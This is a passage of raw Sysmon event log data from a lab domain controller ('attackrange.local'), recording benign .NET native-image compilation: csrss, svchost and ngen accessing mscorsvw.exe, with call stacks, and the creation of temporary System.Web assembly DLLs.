em32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.092{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A2-6000-BF04-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.092{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A2-6000-BF04-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:58.014{08A6967A-46A1-6000-BE04-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3fc-0\System.Web.Extensions.Design.dll2021-01-14 13:26:58.014 10341000x80000000000000008903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A3-6000-C504-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.748{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A3-6000-C504-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.748{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A3-6000-C504-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:59.701{08A6967A-46A3-6000-C404-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd0-0\System.Web.Routing.dll2021-01-14 13:26:59.701 10341000x80000000000000008899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.670{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A3-6000-C404-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.654{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A3-6000-C404-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.654{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A3-6000-C404-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A3-6000-C304-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.561{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A3-6000-C304-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.561{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A3-6000-C304-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:59.483{08A6967A-46A3-6000-C204-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f50-0\System.Web.RegularExpressions.dll2021-01-14 13:26:59.483 10341000x80000000000000008892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.373{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A3-6000-C204-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.358{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46A3-6000-C204-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.358{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A3-6000-C204-000000009A01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.311{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A3-6000-C104-000000009A01}4460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.295{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A3-6000-C104-000000009A01}4460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:59.295{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A3-6000-C104-000000009A01}4460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:59.186{08A6967A-46A2-6000-C004-000000009A01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13fc-0\System.Web.Mobile.dll2021-01-14 13:26:59.186 10341000x80000000000000008906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:00.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A4-6000-C604-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:00.201{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A4-6000-C604-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:00.201{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A4-6000-C604-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A5-6000-C804-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.405{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A5-6000-C804-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.405{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A5-6000-C804-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C